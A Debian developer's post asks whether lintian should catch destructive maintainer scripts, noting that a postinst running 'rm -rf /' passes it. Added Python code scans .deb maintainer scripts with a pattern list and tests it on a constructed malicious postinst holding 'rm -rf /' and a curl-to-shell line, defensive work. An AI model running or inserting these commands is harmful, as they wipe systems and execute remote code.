Does Debian need to enforce a better Security policy for packages?
I am looking into the security policies outlined for package
building, in order to include some notes regarding them in the section
"How does Debian handle security" in the "Securing Debian Manual".
For example, I have recently been asked if a maintainer can do
whatever he wishes in a package. Can he? Sure, we have policies, but what
if we have a Debian developer distributing a trojan in a package? IMHO
lintian does check many issues regarding policy, but it does not test for
potential security problems.
I just made an empty package with dh_make with only a postinst
having 'rm -rf /'. Lintian says:
$ lintian test-rm*deb
E: test-rm: description-is-dh_make-template
E: test-rm: helper-templates-in-copyright
W: test-rm: readme-debian-is-debmake-template
W: test-rm: unknown-section unknown
So. Since we do not do source code audits of incoming packages and
these kinds of issues are not detected automatically... does this leave
the Debian distribution open to attack if a developer box gets hacked?
(I can only imagine this kind of automatic test for correct packages being
done using automatic installation in a controlled chrooted
environment before accepting incoming packages on the upload queues.) And,
even so, events can be triggered only under some conditions.
Should we improve lintian in order to yell if some (destructive) action is
taken upon installation/de-installation? Should we further limit the kind
of commands available in these scripts? (BTW, this only tackles the problem
of installation scripts, not of the program itself...)
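As an added illustration of the lintian improvement the post asks about, here is a small heuristic scanner (example code written for this page, not lintian's or Debian's own) that opens a .deb, pulls the maintainer scripts out of control.tar.*, and flags a few obviously destructive lines such as the 'rm -rf /' postinst above. The minimal package builder, the pattern list and its tags, and the two sample postinst scripts are all constructed for the example.

```python
"""Heuristic scanner for destructive commands in Debian maintainer scripts.

Added example, not lintian's own code. It reads the ar container of a .deb,
finds control.tar.*, and scans preinst/postinst/prerm/postrm line by line for
a handful of constructed patterns. Tags, patterns and samples are illustrative.
"""
import io
import os
import re
import tarfile
import tempfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# (tag, regex) pairs applied to one shell line at a time (constructed list).
DANGEROUS = [
    # rm with a recursive flag aimed at / or a top-level system directory (/usr/* etc.)
    ("rm-root", re.compile(
        r"\brm\s+(?:-\S+\s+)*?-\S*[rR]\S*\s+(?:-\S+\s+)*"
        r"/(?:bin|boot|dev|etc|home|lib|lib64|root|sbin|usr|var)?/?\*?(?=[\s;&|)]|$)")),
    # raw writes to a block device
    ("dd-to-device", re.compile(r"\bdd\b.*\bof=/dev/(?:sd|hd|vd|nvme|mmcblk)")),
    # filesystem creation
    ("mkfs", re.compile(r"\bmkfs(?:\.\w+)?\b")),
    # download piped straight into a shell
    ("pipe-to-shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|da)?sh\b")),
    # redirection into credential or sudo configuration files
    ("auth-file-write", re.compile(r">>?\s*/etc/(?:passwd|shadow|sudoers)\b")),
]


def scan_script(name, text):
    """Return (script, line_no, tag, line) for every line matching a pattern."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments (and the shebang)
        if not line:
            continue
        for tag, pattern in DANGEROUS:
            if pattern.search(line):
                findings.append((name, line_no, tag, line))
    return findings


def iter_ar_members(fh):
    """Yield (name, bytes) for each member of a classic ar archive (the .deb container)."""
    if fh.read(8) != b"!<arch>\n":
        raise ValueError("not an ar archive")
    while True:
        header = fh.read(60)
        if len(header) < 60:
            return
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = header[0:16].decode("ascii").rstrip().rstrip("/")
        size = int(header[48:58].decode("ascii").strip())
        data = fh.read(size)
        if size % 2:
            fh.read(1)  # members are padded to an even offset
        yield name, data


def scan_deb(path):
    """Scan every maintainer script inside control.tar.* of a .deb."""
    findings = []
    with open(path, "rb") as fh:
        for name, data in iter_ar_members(fh):
            if not name.startswith("control.tar"):
                continue
            # "r:*" handles gz/bz2/xz; control.tar.zst needs a zstd-capable Python (3.14+)
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
                for member in tar.getmembers():
                    base = os.path.basename(member.name)
                    if member.isfile() and base in MAINTAINER_SCRIPTS:
                        text = tar.extractfile(member).read().decode("utf-8", "replace")
                        findings.extend(scan_script(base, text))
    return findings


def _ar_member(name, data):
    # 60-byte ar header: name(16) mtime(12) uid(6) gid(6) mode(8) size(10) magic(2)
    header = (f"{name + '/':<16}{'0':<12}{'0':<6}{'0':<6}{'100644':<8}"
              f"{len(data):<10}`\n").encode("ascii")
    return header + data + (b"\n" if len(data) % 2 else b"")


def build_deb(path, postinst_text):
    """Write a minimal constructed .deb (debian-binary + control.tar.gz) for testing."""
    control = "Package: test-rm\nVersion: 0.1\nArchitecture: all\nMaintainer: nobody\nDescription: constructed example\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in (("control", control), ("postinst", postinst_text)):
            data = text.encode()
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(data), 0o755
            tar.addfile(info, io.BytesIO(data))
    with open(path, "wb") as fh:
        fh.write(b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
                 + _ar_member("control.tar.gz", buf.getvalue()))


# Constructed samples: the empty test-rm package from the post, and a benign one.
MALICIOUS_POSTINST = """\
#!/bin/sh
set -e
# constructed postinst for the empty test-rm package
case "$1" in
    configure)
        rm -rf /
        curl -s http://example.invalid/setup | sh
        ;;
esac
"""
BENIGN_POSTINST = """\
#!/bin/sh
set -e
# cleanup confined to the package's own state directory; must not be flagged
rm -rf /var/lib/test-rm/cache
"""


def demo():
    """Build the constructed test-rm .deb in a temp dir and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "test-rm_0.1_all.deb")
        build_deb(path, MALICIOUS_POSTINST)
        return scan_deb(path)


if __name__ == "__main__":
    for script, line_no, tag, line in demo():
        print(f"E: test-rm: {tag} ({script}:{line_no}): {line}")
```

This is a lint-level check in the spirit of the question: it only sees what is literally written in the script, so a command assembled at run time from variables, encoded strings or a downloaded file passes straight through, and the post's own point stands that a chrooted test installation and human review are still needed to catch the actual behaviour.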